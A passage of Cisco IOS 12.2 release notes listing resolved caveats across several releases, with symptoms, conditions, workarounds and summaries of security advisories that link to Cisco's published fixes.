Workaround: Perform the clear ip ospf proc command on all ABRs containing the obsolete LSAs.
Miscellaneous
•
Cisco routers and switches running Cisco IOS or Cisco IOS XR software may be vulnerable to a remotely exploitable crafted IP option Denial of Service (DoS) attack. Exploitation of the vulnerability may potentially allow for arbitrary code execution. The vulnerability may be exploited after processing an Internet Control Message Protocol (ICMP) packet, Protocol Independent Multicast version 2 (PIMv2) packet, Pragmatic General Multicast (PGM) packet, or URL Rendezvous Directory (URD) packet containing a specific crafted IP option in the packet's IP header. No other IP protocols are affected by this issue.
Cisco has made free software available to address this vulnerability for affected customers.
There are workarounds available to mitigate the effects of the vulnerability.
This vulnerability was discovered during internal testing. This advisory is available at http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml
•
Symptoms: Traffic may be duplicated when it passes through HSRP-enabled interfaces.
Conditions: This symptom is observed on a Cisco 2600 series that is configured with a Fast Ethernet interface that contain an AM79c971 chip when the connected hub is a layer 2 device (not a switch).
Workaround: Replace the hub with a switch or enter the standby use-bia command on the Fast Ethernet interface.
Further Problem Description: When HSRP enters the standby state after the router has reloaded, the Fast Ethernet interface enters the non-promiscuous mode. When HSRP becomes active on the router, the Fast Ethernet interface enter the promiscuous mode but remains in this mode even when HSRP enters the standby state again.
•
Symptoms: A router may crash if it receives a packet with a specific crafted IP option as detailed in Cisco Security Advisory: Crafted IP Option Vulnerability:
http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml
Conditions: This DDTS resolves a symptom of CSCec71950. Cisco IOS with this specific DDTS are not at risk of crash if CSCec71950 has been resolved in the software.
Workaround: Cisco IOS versions with the fix for CSCec71950 are not at risk for this issue and no workaround is required. If CSCec71950 is not resolved, see the following Cisco Security Advisory: Crafted IP Option Vulnerability for workaround information:
http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml
•
The Cisco IOS Transmission Control Protocol (TCP) listener in certain versions of Cisco IOS software is vulnerable to a remotely-exploitable memory leak that may lead to a denial of service condition.
This vulnerability only applies to traffic destined to the Cisco IOS device. Traffic transiting the Cisco IOS device will not trigger this vulnerability.
Cisco has made free software available to address this vulnerability for affected customers.
This issue is documented as Cisco bug ID CSCek37177.
There are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-tcp.shtml
•
Symptoms: A Cisco router may reload when you enter the show atm map privileged EXEC command.
Conditions: This symptom is observed on all Cisco routers after you have first deleted a subinterface on which a static map bundle was configured.
Workaround: First remove the static map bundle; then, delete the subinterface.
•
Symptoms: TCP connections that are opened through a Cisco IOS Firewall (CBAC) may not timeout.
Conditions: With Cisco IOS Firewall (CBAC) enabled, the TCP idle timer for a session may be reset even by TCP packets that fail TCP inspection and are subsequently dropped. This could lead to the TCP session not timing out.
Workaround: There is no workaround.
•
Symptoms: Voice over Frame Relay (VOFR) Connection PLAR calls that are configured for FXS fail with tracebacks on a Cisco 7200 originating gateway.
Conditions: This issue is seen when the Cisco 7200 gateway is configured with FXS loopstart or ground start signaling.
Workaround: There is no workaround.
•
Symptoms: A router may unexpectedly reload due to a bus error after being reloaded or power cycled. The last console output in the crashinfo will be the ima-group group number command before the crash.
Conditions: The router must have the ip telnet source- interface command or the ip tftp source- interface command configured to use an IMA sub-interface as the source. There also must be at least one ATM interface in the IMA group.
Workaround: Remove the IMA interface from the source interface command in the configuration.
Resolved Caveats—Cisco IOS Release 12.2(34a)
Cisco IOS Release 12.2(34a) is a rebuild release for Cisco IOS Release 12.2(34). The caveats in this section are resolved in Cisco IOS Release 12.2(34a) but may be open in previous Cisco IOS releases.
The following information is provided for each caveat:
•
•
•
Miscellaneous
•
Cisco routers and switches running Cisco IOS or Cisco IOS XR software may be vulnerable to a remotely exploitable crafted IP option Denial of Service (DoS) attack. Exploitation of the vulnerability may potentially allow for arbitrary code execution. The vulnerability may be exploited after processing an Internet Control Message Protocol (ICMP) packet, Protocol Independent Multicast version 2 (PIMv2) packet, Pragmatic General Multicast (PGM) packet, or URL Rendezvous Directory (URD) packet containing a specific crafted IP option in the packet's IP header. No other IP protocols are affected by this issue.
Cisco has made free software available to address this vulnerability for affected customers.
There are workarounds available to mitigate the effects of the vulnerability.
This vulnerability was discovered during internal testing. This advisory is available at http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml
•
Symptoms: A router may crash if it receives a packet with a specific crafted IP option as detailed in Cisco Security Advisory: Crafted IP Option Vulnerability:
http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml
Conditions: This DDTS resolves a symptom of CSCec71950. Cisco IOS with this specific DDTS are not at risk of crash if CSCec71950 has been resolved in the software.
Workaround: Cisco IOS versions with the fix for CSCec71950 are not at risk for this issue and no workaround is required. If CSCec71950 is not resolved, see the following Cisco Security Advisory: Crafted IP Option Vulnerability for workaround information:
http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml
•
This DDTS documents changes in how IOS handles packets destined to the router or switch.
Resolved Caveats—Cisco IOS Release 12.2(34)
This section describes possibly unexpected behavior by Cisco IOS Release 12.2(34). All the caveats listed in this section are resolved in Cisco IOS Release 12.2(34). This section describes severity 1 and 2 caveats and select severity 3 caveats.
The following information is provided for each caveat:
•
•
•
Basic System Services
•
A vulnerability exists in the IOS HTTP server in which HTML code inserted into dynamically generated output, such as the output from a show buffers command, will be passed to the browser requesting the page. This HTML code could be interpreted by the client browser and potentially execute malicious commands against the device or other possible cross-site scripting attacks. Successful exploitation of this vulnerability requires that a user browse a page containing dynamic content in which HTML commands have been injected.
Cisco will be making free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051201-http.shtml.
Interfaces and Bridging
•
Symptoms: When you reload the microcode onto an enhanced 8-port multichannel T1/E1 port adapter (PA-MC-8TE1+) while traffic is flowing through the port adapter, the following error message may appear:
%RSP-3-RESTART: interface Serial0/0/4:0, not transmitting
In most cases, the interfaces of the port adapter recover on their own. In very rare cases, the execution of a Cbus Complex occurs.
Conditions: This symptom is observed on a Cisco 7500 series.
Workaround: If the interfaces of the port adapter do not recover on their own, execute a Cbus Complex.
•
Symptoms: The show interface interface stats command output incorrectly shows fastswitched packets as process switched packets.
Conditions: This symptom is observed on a Cisco 7200 platform on T1/E1 interfaces only.
Workaround: There is no workaround. Do not rely on the counters displayed by the show interface interface stats command output.
Miscellaneous
•
Symptoms: The 5-minute output rate in the output of the show interfaces command is incorrect for serial interfaces that are configured on a PA-MC-8TE1+ port adapter.
Conditions: This symptom is observed on a Cisco router that is configured with a PA-MC-8TE1+ port adapter.
Workaround: There is no workaround.
Resolved Caveats—Cisco IOS Release 12.2(32)
This section describes possibly unexpected behavior by Cisco IOS Release 12.2(32). All the caveats listed in this section are resolved in Cisco IOS Release 12.2(32). This section describes severity 1 and 2 caveats and select severity 3 caveats.
The following information is provided for each caveat:
•
•
•
Basic System Services
•
Symptoms: Configuring nonexisting NTP peers repeatedly over a period of time may cause a system reload.
Conditions: This symptom may occur on any Cisco Catalyst Switch that is running Cisco IOS releases, but is not platform dependent.
Workaround: Avoid adding/deleting nonexisting NTP peers in quick succession, for example using cut-and-paste.
Interfaces and Bridging
•
Symptoms: CEF, dCEF, and fast-switching counters are not accurate on outbound serial E1 or T1 interfaces.
Conditions: This symptom is observed on a Cisco 7200 series when CEF, dCEF, and fast-switching are enabled on a serial E1 or T1 interface.
Workaround: There is no workaround.
Miscellaneous
•
Symptoms: A VC may experience an output stuck condition.
Conditions: This symptom occurs when using T1 ATM (the IMA function is not used) on a PA-A3-8T1IMA.
Workaround: Perform the clear interface command.
•
Symptoms: When a line card has reloaded because you reloaded the router, the line card crashed, or you entered a command to reload the line card, the following message may appear on the console:
%MDS-2-RP: MDFS is disabled on some line card(s). Use "show ip mds stats linecard" to view status and "clear ip mds linecard" to reset.
This message may be generated because MDFS is erroneously disabled on the reloaded line card. Erroneous disabling of MDFS may unnecessarily extend network convergence time.
Conditions: This symptom is observed on a distributed router or switch such as a Cisco Catalyst 6000 series, Cisco 7500 series, Cisco 7600 series, Cisco 10000 series, and Cisco 12000 series. The symptom occurs when the router has the ip multicast-routing distributed command enabled for any VRF and when a line card is reloaded more than 50 seconds into the 60-second MDFS flow-control period.
Workaround: The symptom corrects itself after 60 seconds. Alternatively, you can enter the clear ip mds linecard slot number command.
•
The Cisco IOS Stack Group Bidding Protocol (SGBP) feature in certain versions of Cisco IOS software is vulnerable to a remotely-exploitable denial of service condition. Devices that do not support or have not enabled the SGBP protocol are not affected by this vulnerability.
Cisco has made free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability.
Cisco has published a Security Advisory on this issue; it is available at http://www.cisco.com/warp/public/707/cisco-sa-20060118-sgbp.shtml
•
Symptoms: Data that is forwarded downstream from a SNASw router is intermittently corrupted. Sniffer traces that are captured upstream and downstream from the SNASw router show that the data that is sent from the host to the SNASw router is fine, but when the data leaves the SNASw router, there are some corrupted bytes at the end of the data stream.
Conditions: This symptom is observed on a SNASw router that is connected upstream to a mainframe host via Enterprise Extender.
Workaround: There is no workaround.
•
Symptoms: An SNA Switch (SNASw) router reloads in snaswitch code in case of memory shortage.
Conditions: This symptom was observed with a router that is concentrating downstream physical units (DSPU) via DLSw/VLDC, and forwarding their traffic via HPR/LLC to the mainframes. There are about 300 to 400 physical units concentrated via the SNASw/DLUR. There are total of 16 routers in this system, with pairs of 8 routers backing up each other.
Workaround: There is no workaround.
•
Symptoms: A router running SNA Switch (SNASw) may reload unexpectedly after logging the following messages:
Sep 13 08:42:45.950 METDST: %SNASW-3-SM_LOG_5: PROBLEM - 287990 - Insufficient storage to activate LU6.2 session
Sep 13 08:42:46.014 METDST: %SNASW-3-SS_LOG_16: PROBLEM - 287994 - CP capabilities exchange failed because of contention winner CP-CP session failure
Sep 13 08:42:47.946 METDST: %SNASW-3-SS_LOG_16: PROBLEM - 288001 - CP capabilities exchange failed because of contention winner CP-CP session failure (Message suppressed 16 times) Sep 13 08:42:47.946 METDST: %SNASW-3-SM_LOG_5: PROBLEM - 287991 - Insufficient storage to activate LU6.2 session (Message suppressed 109 times)TLB (load or instruction fetch) exception, CPU signal 10, PC = 0x61327E00
Conditions: This symptom has been observed on a DLSw/SNASw concentration router which is providing connectivity for 300 to 400 physical units through DLSw.
Workaround: There is no workaround.
•
Symptoms: In rare circumstances, an SNA Switch (SNASw) may get a "half session" towards the backup DLUS; issuing the show snasw session local command, and verifying the details that there is a CONWINNER, but no CONLOSER. On the mainframe side, the link appears to hang.
This creates no problem in operation, except when issuing a GiveBack command or a Takeover command, in which case, the link towards the backup DLUS does not work.
Conditions: This symptom has been observed on a Cisco 7200 router with an SNASw.
Workaround: The situation can be cleared with a snasw stop session pcid using the PCID shown with the show snasw session local command.
Wide-Area Networking
•
Symptoms: A Cisco router may crash unexpectedly due to a bus error when it dereferences a pointer to freed memory in one of the error paths in TCP-to-PAD translation.
Conditions: This symptom is observed on a Cisco 7500 series router.
Workaround: There is no workaround.
Resolved Caveats—Cisco IOS Release 12.2(31)
This section describes possibly unexpected behavior by Cisco IOS Release 12.2(31). All the caveats listed in this section are resolved in Cisco IOS Release 12.2(31). This section describes severity 1 and 2 caveats and select severity 3 caveats.
The following information is provided for each caveat:
•
•
•
IBM Connectivity
•
Symptoms: DLSw circuits do not connect.
Conditions: This symptom is observed when DLSw Ethernet redundancy is configured via the dlsw transparent switch-support command.
Workaround: Recycle DLSw on the master router.
Further Problem Description: The output of the show dlsw transparent cache command shows the NEGATIVE state for the circuits on the master router although no actual circuits exist on either the master router or the slave router.
•
Symptoms: Removing BSTUN peer attribute causes a Cisco router to crash.
Conditions: This symptom occurs when changing the bstun protocol- group protocol name global configuration command and subsequently changing the bsc char-set value (from ascii to ebcdic or vice versa) on the BTSUN encapsulated interface. The router will crash.
Workaround: There is no workaround.
Miscellaneous
•
Symptoms: A user session may pause indefinitely, causing a Cisco router to become unresponsive.
Conditions: This symptom is observed when multiple simultaneous users enter modular QoS CLI (MQC) commands on the same router via separate vty sessions.
Workaround: Allow only one user at a time to enter MQC commands.
•
Symptoms: If a key is configured on a tunnel interface, the inbound access-list on that interface is ignored.
Conditions: This problem is seen with a configuration that is similar to the following:
interface Tunnel0
ip address 192.168.1.1 255.255.255.0
ip access-group 100 in
tunnel source FastEthernet0/0
tunnel destination 172.16.1.1
tunnel key 1
end
This problem does not occur if "tunnel key" is not configured.
Workaround: Remove the "tunnel key."
•
Symptoms: A Cisco router may reload when you enter the show standby or show standby brief command.
Conditions: This symptom is observed on a Cisco Multiprocessor WAN Application Module MWAM) when multiple HSRP groups are configured and unconfigured in a loop while traffic for the HSRP groups is being processed. The symptom may be platform-independent.
However, a stress scenario in which many HSRP groups are configured and unconfigured while the show standby or show standby brief command is executed may be a rather uncommon scenario.
Workaround: Do not to enter the show standby or show standby brief command while configuration changes are being made.
•
Symptoms: Unable to configure framing CRC4 (Australian) on a Channelized E1.
Conditions: This symptom is observed on a Cisco 10000 series router but is not platform dependent.
Workaround: There is no workaround.
•
Symptoms: A SegV exception may occur on a router when you enter the write memory or copy running-config startup-config command.
Conditions: This symptom is observed on a Cisco 1700 series and Cisco 2600 series when you enter the write memory or copy running-config startup-config command and when the NVRAM is corrupted.
Workaround: Erase the NVRAM and then enter the write memory or copy running-config startup-config command.
•
Symptoms: VIP with PA-2FE may reload due to memory corruption caused by PA-2FE hardware.
Conditions: This problem is triggered when VIP/PA is stressed, VIP is not able to serve memory read/write request from PA hardware, and there are PCI retry timeouts.
Workaround: There is no workaround.
•
Symptoms: A Cisco 7200 series that is configured with an NPE-G1 may reload unexpectedly because of a bus error.
Conditions: This symptom is observed when the Cisco 7200 series is configured for Fast Switching.
Workaround: There is no workaround.
•
Symptoms: The ip mroute-cache distributed interface configuration command is not retained after you reload a router.
Conditions: This symptom is observed on a Cisco 7500 series.
Workaround: After the router has reloaded, reconfigure the ip mroute-cache distributed interface configuration command on each affected interface.
•
Symptoms: The PIM assert mechanism may not function properly, causing PE routers to remove VRF subinterfaces from output interface lists, and, in turn, causing multicast traffic to be dropped.
Conditions: This symptom is observed when redundant PE routers and CE routers are located on one LAN segment and when the CE routers select different PE routers as their next hop.
Workaround: Change the configuration in such a way that all CE routers on one LAN segment select the same PE router as their next hop.
•
Cisco IOS may permit arbitrary code execution after exploitation of a heap-based buffer overflow vulnerability. Cisco has included additional integrity checks in its software, as further described below, that are intended to reduce the likelihood of arbitrary code execution.
Cisco has made free software available that includes the additional integrity checks for affected customers.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051102-timers.shtml.
•
Symptoms: When you enter the channel-group command, a router may crash.
Conditions: This symptom is observed when you enter the channel-group command on native FE interfaces on a Cisco 3660 router or on NM-xFE interfaces on a Cisco 3600 series or Cisco 3700 series.
The channel-group command should not be used on native FE ports or on NM-FE ports because it is not supported on these ports. The channel-group command is meant only for NM-1GE GE ports and switching FE ports.
Workaround: There is no workaround. The fix for this DDTS ensure that the router does not crash. However, the EtherChannel is not supported on native FE ports and NM-xFE ports on a Cisco 3600 series and Cisco 3700 series.
•
Symptoms: At a cold temperature, a Cisco 7200 series does not boot with a PA-A3-8T1IMA or PA-A3-8E1IMA port adapter and generates a watchdog timeout error.
Conditions: This symptom is observed on a Cisco 7200 series that is configured with an NPE-300 or NPE-400 and an IMA port adapter.
Workaround: There is no workaround.
•
Symptoms: A Cisco 7200 series or Cisco 7500 series may crash when bridged PVCs are deleted and added to an IMA interface of a PA-A3-8T1IMA or PA-A3-8E1IMA port adapter.
Conditions: This symptom is observed when the router is configured for bridging across ATM IMA PVCs, when the PVCs carry traffic, and when a script runs that deletes and adds PVCs across the IMA links. These PVCs are not among the bridged PVCs that carry traffic. The router crashes in about one to two hours.
Workaround: There is no workaround.
•
Symptoms: A router misses an entry in its label forwarding table, which is shown in the output of the show tag-switching forwarding-table EXEC command for the missing entry and in the output of the show ip cef detail EXEC command for the prefix.
Conditions: This symptom is observed on a Cisco router that is configured for Multiprotocol Label Switching (MPLS) and that learns its routes through iBGP from redundant route reflectors (RRs) when BGP labeling is not enabled.
Workaround: There is no workaround. However, when you enter the clear ip route EXEC command for the affected prefix, the prefix is reinstalled in the label forwarding table.
•
Symptoms: A Cisco router that is running Cisco IOS Release 12.2, 12.2S, 12.2T, 12.3, or 12.3T may fail to fast switch IP packets correctly when NAT has been configured.
Conditions: This problem can only occur when NAT has been configured on the router.
Workaround: Disable fast-switching IP packets allow packets to be correctly process switched.
Wide-Area Networking
•
Symptoms: A router that is configured for PPP Multilink reloads because of a bus error.
Conditions: This symptom is observed after a Telnet or SSH session is established when you enter the who command.
Workarounds: There is no workaround.
Resolved Caveats—Cisco IOS Release 12.2(29b)
Cisco IOS Release 12.2(29b) is a rebuild release for Cisco IOS Release 12.2(29). The caveats in this section are resolved in Cisco IOS Release 12.2(29b) but may be open in previous Cisco IOS releases.
The following information is provided for each caveat:
•
•
•
Basic System Services
•
Symptoms: Tracebacks or crash are seen during HTTP transactions with long URLs.
Conditions: The crash is seen when the length of any token in the URL of the request is excessively long.
Workaround: Disable HTTP server using the no ip http server command.
•
A vulnerability exists in the IOS HTTP server in which HTML code inserted into dynamically generated output, such as the output from a show buffers command, will be passed to the browser requesting the page. This HTML code could be interpreted by the client browser and potentially execute malicious commands against the device or other possible cross-site scripting attacks. Successful exploitation of this vulnerability requires that a user browse a page containing dynamic content in which HTML commands have been injected.
Cisco will be making free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051201-http.shtml
•
Symptoms: A tftp client trying to transfer a file from a Cisco IOS device configured as a tftp server and which is denied by an ACL receives a different result depending if the file is being offered for download or not. This may allow a third party to enumerate which files are available for download.
Conditions: The tftp-server command is configured on the device and an ACL restricting access to the file in question has been applied as in this example:
tftp-server flash:filename1 access-list-numberaccess-list access-list- numberpermit 192.168.1.0 0.0.0.255access-list access-list- numberdeny anyWorkaround: The following workarounds can be applied:
1. Interface ACL Configure and attach an access list to every router interface active and configured for IP packet processing. Example:
access-list access-list- numberremark --- the following hosts and networks area ALLOWED for TFTP accessaccess-list access-list- numberpermit udp host source_1host interface_address_1eq 69access-list access-list- numberpermit udp host source_2host interface_address_2eq 69access-list access-list- numberpermit udp source source- wildcardhost interface_address_1eq 69access-list access-list- numberpermit udp source source- wildcardhost interface_address_2eq 69access-list access-list- numberremark --- everyone else is DENIED for TFTP accessaccess-list access-list- numberdeny udp any host interface_address_1eq 69access-list access-list- numberdeny udp any host interface_address_2eq 69access-list access-list- numberremark --- any other traffic to/through the router is allowedaccess-list access-list- numberpermit ip any anyinterface Ethernet0/0ip access-group access-list- number inOnce the tftp server in Cisco IOS is enabled and listening by default on all interfaces enabled for IP processing, the access list would need to deny traffic to each and every IP address assigned to any active router interface.
2. Control Plane Policing Configure and apply a CoPP policy. For example:
access-list access-list- numberremark --- Do not police TFTP traffic from trusted hosts and networksaccess-list access-list- numberdeny udp host source_1 any eq 69access-list access-list- numberdeny udp source source- wildcard any eq 69access-list access-list- numberremark --- Police TFTP traffic from untrusted hosts and networksaccess-list access-list- numberpermit udp any any eq 69access-list access-list- numberremark --- Do not police any other traffic going to the routeraccess-list access-list- numberdeny ip any anyclass-map match-all tftp- classmatch access-group access-list- numberpolicy-map control-plane- policy! Drop all traffic that matches the class tftp- classclass tftp- classdropcontrol-plane service-policy input control- plane- policyNote: CoPP is only available on certain platforms and Cisco IOS releases. Additional information on the configuration and use of the CoPP feature can be found at the following URL: http://www.cisco.com/en/US/products/sw/iosswrel/ps1838/products_white_paper09186a0080211f39.shtml
3. Infrastructure ACLs (iACL) Although often difficult to block traffic transitting your network, identifying traffic which should never be allowed to target your infrastructure devices and block that traffic at the border of your network is possible. Infrastructure ACLs are considered a network security best practice and should be considered as a long-term addition to good network security as well as a workaround for this specific vulnerability. The white paper entitled "Protecting Your Core: Infrastructure Protection Access Control Lists" presents guidelines and recommended deployment techniques for iACLs: http://www.cisco.com/warp/public/707/iacl.html
4. Configuring Receive Access Lists (rACLs) For distributed platforms, rACLs may be an option starting in Cisco IOS Release 12.0(21)S2 for the Cisco 12000 series GSR and Cisco IOS Release 12.0 (24)S for the Cisco 7500 series. The receive access lists protect the device from harmful traffic before the traffic can impact the route processor. Receive path ACLs are considered a network security best practice, and should be considered as a long-term addition to good network security, as well as a workaround for this specific vulnerability. The CPU load is distributed to the line card processors and helps mitigate load on the main route processor. The white paper entitled "GSR: Receive Access Control Lists" will help identify and allow legitimate traffic to your device and deny all unwanted packets: http://www.cisco.com/warp/public/707/racl.html
NOTE: The suggested workarounds are an "all or nothing" solution. While the tftp-server feature in Cisco IOS allows per-file ACLs to be attached to every file being offered for download, the suggested workarounds are global and will either prevent or allow access to all files being shared. It is recommended to apply the suggested workarounds in addition to the existing per-file ACLs, instead of replacing them.
•
Symptoms: Starting in calendar year 2007, daylight savings summer-time rules may cause Cisco IOS to generate timestamps (such as in syslog messages) that are off by one hour.
Conditions: The Cisco IOS configuration command:
clock summer-time zone recurring
uses United States standards for daylight savings time rules by default. The Energy Policy Act of 2005 (H.R.6.ENR), Section 110 changes the start date from the first Sunday of April to the second Sunday of March. It changes the end date from the last Sunday of October to the first Sunday of November.
Workaround: A workaround is possible by using the clock summer- time configuration command to manually configure the proper start date and end date for daylight savings time. After the summer-time period for calendar year 2006 is over, one can for example configure:
clock summer-time PDT recurring 2 Sun Mar 2:00 1 Sun Nov 2:00
(This example is for the US/Pacific time zone.)
Not A Workaround: Using NTP is not a workaround to this problem. NTP does not carry any information about timezones or summertime.
•
Cisco IOS Software has been enhanced with the introduction of additional software checks to signal improper use of internal data structures. This enhancement was introduced in select Cisco IOS software releases published after April 5, 2007.
Details: With the new enhancement in place, Cisco IOS software will emit a "%DATACORRUPTION-1-DATAINCONSISTENCY" error message when it detects an inconsistency in its internal data structures. This is a new error message. The following is an example.
The %DATACORRUPTION-1-DATAINCONSISTENCY error message is preceded by a timestampMay 17 10:01:27.815 UTC: %DATACORRUPTION-1-DATAINCONSISTENCY: copy errorThe error message is then followed by a traceback.
It is important to note that this error message does not imply that packet data is being corrupted. It does, however, provide an early indicator of other conditions that can eventually lead to poor system performance or an IOS restart.
Recommended Action: Collect show tech-support command output and open a service request with the Technical Assistance Center (TAC) or designated support organization. Pay particular attention to any other error messages or error symptoms that accompany the "%DATACORRUPTION-1-DATAINCONSISTENCY" message and note those to your support contact.
IBM Connectivity
•
A vulnerability exists in the Data-link Switching (DLSw) feature in Cisco IOS where an invalid value in a DLSw message could result in a reload of the DLSw device. Successful exploitation of this vulnerability requires that an attacker be able to establish a DLSw connection to the device.
There are workarounds available for this vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070110-dlsw.shtml
IP Routing Protocols
•
Cisco routers and switches running Cisco IOS or Cisco IOS XR software may be vulnerable to a remotely exploitable crafted IP option Denial of Service (DoS) attack. Exploitation of the vulnerability may potentially allow for arbitrary code execution. The vulnerability may be exploited after processing an Internet Control Message Protocol (ICMP) packet, Protocol Independent Multicast version 2 (PIMv2) packet, Pragmatic General Multicast (PGM) packet, or URL Rendezvous Directory (URD) packet containing a specific crafted IP option in the packet's IP header. No other IP protocols are affected by this issue.
Cisco has made free software available to address this vulnerability for affected customers.
There are workarounds available to mitigate the effects of the vulnerability.
This vulnerability was discovered during internal testing.
This advisory is available at:
http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml
•
The Cisco Next Hop Resolution Protocol (NHRP) feature in Cisco IOS contains a vulnerability that can result in a restart of the device or possible remote code execution.
NHRP is a primary component of the Dynamic Multipoint Virtual Private Network (DMVPN) feature.
NHRP can operate in three ways: at the link layer (Layer 2), over Generic Routing Encapsulation (GRE) and multipoint GRE (mGRE) tunnels and directly on IP (IP protocol number 54). This vulnerability affects all three methods of operation.
NHRP is not enabled by default for Cisco IOS.
This vulnerability is addressed by Cisco bug IDs CSCin95836 (registered customers only) for non-12.2 mainline releases and CSCsi23231 (registered customers only) for 12.2 mainline releases.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-nhrp.shtml.
Miscellaneous
•
The Cisco IOS Stack Group Bidding Protocol (SGBP) feature in certain versions of Cisco IOS software is vulnerable to a remotely-exploitable denial of service condition. Devices that do not support or have not enabled the SGBP protocol are not affected by this vulnerability.
Cisco has made free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability.
Cisco has published a Security Advisory on this issue; it is available at http://www.cisco.com/warp/public/707/cisco-sa-20060118-sgbp.shtml
•
Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.
Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker will not be able to decrypt any previously encrypted information.
Cisco IOS is affected by the following vulnerabilities:
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml
Note: Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml
A combined software table for Cisco IOS is available to aid customers in choosing a software releases that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.
•
Symptoms: A Cisco router may experience a bus error crash.
Conditions: This symptom may be triggered by an event such as an ISDN connection.
Workaround: There is no workaround.
•
Symptoms: TCP connections that are opened through a Cisco IOS Firewall (CBAC) may not timeout.
Conditions: With Cisco IOS Firewall (CBAC) enabled, the TCP idle timer for a session may be reset even by TCP packets that fail TCP inspection and are subsequently dropped. This could lead to the TCP session not timing out.
Workaround: There is no workaround.
•
Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.
Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker will not be able to decrypt any previously encrypted information.
Cisco IOS is affected by the following vulnerabilities:
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.
Note: Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml
A combined software table for Cisco IOS is available to aid customers in choosing a software releases that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.
•
Two crafted Protocol Independent Multicast (PIM) packet vulnerabilities exist in Cisco IOS software that may lead to a denial of service (DoS) condition. Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are available.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml.
•
Multiple Cisco products contain either of two authentication vulnerabilities in the Simple Network Management Protocol version 3 (SNMPv3) feature. These vulnerabilities can be exploited when processing a malformed SNMPv3 message. These vulnerabilities could allow the disclosure of network information or may enable an attacker to perform configuration changes to vulnerable devices. The SNMP server is an optional service that is disabled by default. Only SNMPv3 is impacted by these vulnerabilities. Workarounds are available for mitigating the impact of the vulnerabilities described in this document.
The United States Computer Emergency Response Team (US-CERT) has assigned Vulnerability Note VU#878044 to these vulnerabilities.
Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-0960 has been assigned to these vulnerabilities.
This advisory will be posted at http://www.cisco.com/warp/public/707/cisco-sa-20080610-snmpv3.shtml
•
Multiple vulnerabilities exist in the Cisco IOS File Transfer Protocol (FTP) Server feature. These vulnerabilities include Denial of Service, improper verification of user credentials and the ability to read or write any file in the device's filesystem, including the device's saved configuration, which may include passwords or other sensitive information.
The IOS FTP Server is an optional service that is disabled by default. Devices that are not specifically configured to enable the IOS FTP Server service are unaffected by these vulnerabilities.
This vulnerability does not apply to the IOS FTP Client feature.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070509-iosftp.shtml.
•
Symptoms: Malformed SSL packets may cause a router to leak multiple memory blocks.
Conditions: This symptom is observed on a Cisco router that has the ip http secure server command enabled.
Workaround: Disable the ip http secure server command.
•
Symptoms: A caller ID may be received with extra characters.
Conditions: This symptom is observed when caller ID is enabled on both routers and when the station ID and station name are configured on the FXS side.
Workaround: There is no workaround.
TCP/IP Host-Mode Services
•
The Cisco IOS Transmission Control Protocol (TCP) listener in certain versions of Cisco IOS software is vulnerable to a remotely-exploitable memory leak that may lead to a denial of service condition.
This vulnerability only applies to traffic destined to the Cisco IOS device. Traffic transiting the Cisco IOS device will not trigger this vulnerability.
Cisco has made free software available to address this vulnerability for affected customers.
This issue is documented as Cisco bug ID CSCek37177
There are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-tcp.shtml
•
Symptoms: A router that is running RCP can be reloaded by a specific packet.
Conditions: This symptom is seen under the following conditions:
–
–
–
Workaround: Put access lists on the edge of your network blocking RCP packets to prevent spoofed RSH packets. Use another protocol such as SCP. Use VTY ACLs.
